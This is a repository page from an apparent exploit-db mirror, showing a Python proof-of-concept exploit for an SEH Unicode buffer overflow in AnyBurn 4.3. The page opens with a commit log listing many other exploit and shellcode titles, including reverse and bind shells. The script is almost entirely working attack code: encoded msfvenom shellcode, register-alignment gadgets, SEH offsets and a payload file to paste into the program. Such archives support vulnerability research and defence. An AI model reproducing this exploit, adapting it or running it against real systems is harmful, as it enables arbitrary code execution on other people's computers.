bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows_x86/local/46507.py
Offensive Security 720fabd066 DB: 2020-07-28 
114 changes to exploits/shellcodes

Notepad++ < 7.7 (x64)  - Denial of Service

winrar 5.80 64bit - Denial of Service
WinRAR 5.80 (x64) - Denial of Service

Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter 'target_offset' Out-of-Bounds Privilege Escalation

TeamViewer 11 < 13 (Windows 10 x86) - Inline Hooking / Direct Memory Modification Permission Change

Microsoft Windows 7 SP1 x86 - GDI Palette Objects Local Privilege Escalation (MS17-017)
Microsoft Windows 7 SP1 (x86) - GDI Palette Objects Local Privilege Escalation (MS17-017)

Microsoft Word 2007 (x86) - Information Disclosure

IKARUS anti.virus 2.16.7 - 'ntguard_x64' Local Privilege Escalation

ASX to MP3 Converter 1.82.50 (Windows 2003 x86) - '.asx' Local Stack Overflow
Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation
Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation
Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation
Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation

Microsoft Internet Explorer 11 (Windows 7 x64/x86) - vbscript Code Execution
Microsoft Internet Explorer 11 (Windows 7 x86/x64) - vbscript Code Execution

Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - 'Mutagen Astronomy' Local Privilege Escalation

R 3.4.4 (Windows 10 x64) - Buffer Overflow (DEP/ASLR Bypass)

MySQL User-Defined (Linux) (x32/x86_64) - 'sys_exec' Local Privilege Escalation
MySQL User-Defined (Linux) (x86) - 'sys_exec' Local Privilege Escalation

Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)

Microsoft Windows (x84/x64) - 'Error Reporting' Discretionary Access Control List / Local Privilege Escalation
Microsoft Windows (x86/x64) - 'Error Reporting' Discretionary Access Control List / Local Privilege Escalation

Microsoft Windows (x86) - Task Scheduler' .job' Import Arbitrary Discretionary Access Control List Write / Local Privilege Escalation

R 3.4.4 (Windows 10 x64) - Buffer Overflow SEH (DEP/ASLR Bypass)

Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x64) - 'AF_PACKET' Race Condition Privilege Escalation

Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation

Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH)

Atomic Alarm Clock x86 6.3 - 'AtomicAlarmClock' Unquoted Service Path

DEWESoft X3 SP1 (64-bit) - Remote Command Execution
DEWESoft X3 SP1 (x64) - Remote Command Execution

CompleteFTP Professional 12.1.3 - Remote Code Execution

TeamCity Agent XML-RPC 10.0 - Remote Code Execution

eGroupWare 1.14 - 'spellchecker.php' Remote Command Execution

FreeBSD x86 / x64 - execve(/bin/sh) Anti-Debugging Shellcode (140 bytes)
FreeBSD x86/x64 - execve(/bin/sh) Anti-Debugging Shellcode (140 bytes)

Linux/x86 - /usr/bin/head -n99 cat etc/passwd Shellcode (61 Bytes)

Linux/x86 - Kill All Processes Shellcode (14 bytes)
Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes)
Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes)
Linux/x86 - execve /bin/sh Shellcode (25 bytes)
Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)
Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes)
Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes)
Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes)
Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes)
Linux/x86 - execve /bin/sh Shellcode (25 bytes)
Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)
Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes)
Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes)
Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)
Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114 bytes)
Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)
Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114 bytes)
Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes)
Linux/x86 - Bind Shell Generator Shellcode (114 bytes)
Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes)
Linux/x86 - Bind Shell Generator Shellcode (114 bytes)
Windows/x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)
Linux\x86 - 'reboot' polymorphic Shellcode (26 bytes)
Windows/x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)
Linux/x86 - 'reboot' polymorphic Shellcode (26 bytes)
Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes)
Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes)
Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes)
Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes)
2020-07-28 05:01:59 +00:00

128 lines
No EOL
6.4 KiB
Python
Executable file
Raw Blame History

#!/usr/bin/python
# Exploit Title: Anyburn 4.3 - 'Copy disc to image file' Buffer Overflow - (UNICODE)(SEH)
# Version: 4.3
# Date: 07-03-2019
# Author: Hodorsec (hodorsec@protonmail.com / hodor@hodorsec.com)
# Vendor Homepage: http://www.anyburn.com/
# Software Link: http://www.anyburn.com/download.php
# Tested on: Win7 x86 SP1 build 7601
# Caveats: - Heavy character expansion from byte range 0x80 until 0x9f. I've mapped the character translation for convenience.
# - Modify 'crash_nseh' and 'ret_jmp' variable offsets for different OS'es / servicepacks
#
# Character expansion mapping
# 80 --> 20ac, 81 --> 81
# 82 --> 201a, 83 --> 0192
# 84 --> 201e, 85 --> 2026
# 86 --> 2020, 87 --> 2021
# 88 --> 02c6, 89 --> 2030
# 8a --> 0160, 8b --> 2039
# 8c --> 0152, 8d --> 8d
# 8e --> 017d, 8f --> 8f
# 90 --> 90 , 91 --> 2018
# 92 --> 2019, 93 --> 201c
# 94 --> 201d, 95 --> 2022
# 96 --> 2013, 97 --> 2014
# 98 --> 02dc, 99 --> 2122
# 9a --> 0161, 9b --> 203a
# 9c --> 0153, 9d --> 9d
# 9e --> 017e, 9f --> 0178
#
# PoC
# 1.) Generate sploit_anyBURN_seh_unicode.txt, copy the contents to clipboard
# 2.) In the application, open 'Copy disc to image file'
# 3.) Paste the contents of the TXT file in 'Image file name'
# 4.) Click "Create Now" and watch Anyburn BURN!
import sys, struct
filename = "sploit_anyburn_seh_unicode.txt"
# Maximum length
maxlen = 10000
# Shellcode
# msfvenom -p windows/exec cmd=calc.exe -e x86/unicode_mixed -f python -b "\x00\x0a\x0d" -v shellcode bufferregister=eax
# Size 512
shellcode = ""
shellcode += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41"
shellcode += "\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
shellcode += "\x49\x41\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51"
shellcode += "\x41\x44\x41\x5a\x41\x42\x41\x52\x41\x4c\x41\x59"
shellcode += "\x41\x49\x41\x51\x41\x49\x41\x51\x41\x49\x41\x68"
shellcode += "\x41\x41\x41\x5a\x31\x41\x49\x41\x49\x41\x4a\x31"
shellcode += "\x31\x41\x49\x41\x49\x41\x42\x41\x42\x41\x42\x51"
shellcode += "\x49\x31\x41\x49\x51\x49\x41\x49\x51\x49\x31\x31"
shellcode += "\x31\x41\x49\x41\x4a\x51\x59\x41\x5a\x42\x41\x42"
shellcode += "\x41\x42\x41\x42\x41\x42\x6b\x4d\x41\x47\x42\x39"
shellcode += "\x75\x34\x4a\x42\x79\x6c\x39\x58\x35\x32\x6d\x30"
shellcode += "\x4b\x50\x6b\x50\x73\x30\x64\x49\x4b\x35\x4e\x51"
shellcode += "\x35\x70\x61\x54\x74\x4b\x6e\x70\x6e\x50\x64\x4b"
shellcode += "\x61\x42\x7a\x6c\x72\x6b\x62\x32\x6d\x44\x64\x4b"
shellcode += "\x44\x32\x6b\x78\x5a\x6f\x45\x67\x6f\x5a\x6b\x76"
shellcode += "\x4d\x61\x49\x6f\x34\x6c\x4f\x4c\x43\x31\x71\x6c"
shellcode += "\x39\x72\x4e\x4c\x4b\x70\x49\x31\x38\x4f\x4c\x4d"
shellcode += "\x6a\x61\x76\x67\x67\x72\x58\x72\x31\x42\x62\x37"
shellcode += "\x64\x4b\x50\x52\x7a\x70\x32\x6b\x4f\x5a\x4f\x4c"
shellcode += "\x42\x6b\x70\x4c\x6b\x61\x34\x38\x7a\x43\x51\x38"
shellcode += "\x6d\x31\x78\x51\x6f\x61\x52\x6b\x30\x59\x6f\x30"
shellcode += "\x4b\x51\x79\x43\x72\x6b\x4f\x59\x5a\x78\x68\x63"
shellcode += "\x6c\x7a\x30\x49\x62\x6b\x4e\x54\x42\x6b\x6b\x51"
shellcode += "\x4a\x36\x4c\x71\x6b\x4f\x44\x6c\x46\x61\x78\x4f"
shellcode += "\x4c\x4d\x69\x71\x56\x67\x6c\x78\x57\x70\x63\x45"
shellcode += "\x59\x66\x6a\x63\x51\x6d\x4a\x58\x4d\x6b\x71\x6d"
shellcode += "\x4e\x44\x52\x55\x4b\x34\x42\x38\x54\x4b\x4e\x78"
shellcode += "\x6b\x74\x79\x71\x79\x43\x53\x36\x74\x4b\x4a\x6c"
shellcode += "\x50\x4b\x34\x4b\x31\x48\x4d\x4c\x69\x71\x57\x63"
shellcode += "\x72\x6b\x4a\x64\x74\x4b\x69\x71\x78\x50\x31\x79"
shellcode += "\x50\x44\x6d\x54\x6c\x64\x71\x4b\x51\x4b\x70\x61"
shellcode += "\x72\x39\x70\x5a\x30\x51\x39\x6f\x6b\x30\x61\x4f"
shellcode += "\x31\x4f\x6f\x6a\x32\x6b\x4d\x42\x4a\x4b\x72\x6d"
shellcode += "\x4f\x6d\x51\x5a\x39\x71\x42\x6d\x75\x35\x75\x62"
shellcode += "\x4d\x30\x59\x70\x4d\x30\x70\x50\x33\x38\x6e\x51"
shellcode += "\x52\x6b\x42\x4f\x53\x57\x6b\x4f\x46\x75\x55\x6b"
shellcode += "\x6a\x50\x46\x55\x33\x72\x4f\x66\x62\x48\x66\x46"
shellcode += "\x72\x75\x65\x6d\x43\x6d\x39\x6f\x67\x65\x6d\x6c"
shellcode += "\x39\x76\x61\x6c\x4a\x6a\x31\x70\x59\x6b\x79\x50"
shellcode += "\x74\x35\x49\x75\x35\x6b\x6f\x57\x6e\x33\x72\x52"
shellcode += "\x62\x4f\x70\x6a\x39\x70\x42\x33\x39\x6f\x49\x45"
shellcode += "\x42\x43\x4f\x71\x52\x4c\x70\x63\x4c\x6e\x30\x65"
shellcode += "\x51\x68\x51\x55\x49\x70\x41\x41"
# Align reg EBP to RET into EAX
# EBP = 0x04f6acb8, Buffer = 0x04f6b70a, Buffer - EBP = 0x0a52 --> 0x0b00
align_ebp = (
"\x73" # Padding
"\x55" # PUSH EBP
"\x73" # Padding
"\x58" # POP EAX
"\x73" # Padding
"\x05\x0f\x11" # "\x05\x00\x0f\x00\x11" # 05000f0011 add eax,0x11000f00 --\
"\x73" # Padding |--> Adds 0x0b00 bytes
"\x2d\x04\x11" # "\x2d\x00\x04\x00\x11" # 2d00040011 sub eax,0x11000400 --/
"\x73" # Padding
"\x50" # PUSH EAX
"\x73" # Padding
"\xc3" # RET
)
# Offsets
crash_nseh = 9197 # NSEH, might be different on other Windows version/SP
crash_seh = crash_nseh + 4 # SEH
ret_jmp = 87 # Offset for which the 'align_ebp' instructions land
# Variables
prefix = "\x73" * ret_jmp # Padding
prefix += shellcode # UNICODE encoded shellcode
prefix += "\x73" * (crash_nseh - len(prefix)) # Additional padding to reach NSEH
nseh = "\x83\x43" # 0x83 Expands to 0x0192 --> XCHG EAX,EDX # Expanded instruction in SEH now does get executed due to swapped regs
seh = "\x95\x47" # 0x00470095 Expands to 0x00472022 --> # POP POP RET # AnyBurn.exe
suffix = align_ebp # Align registers to jump to beginning of buffer
suffix += "\x73" * (maxlen - len(prefix + nseh + seh + suffix)) # Padding
# Crafting payload
payload = prefix + nseh + seh + suffix
# Create file
f = open(filename, 'wb')
f.write(payload)
f.close()
Reference in a new issue View git blame Copy permalink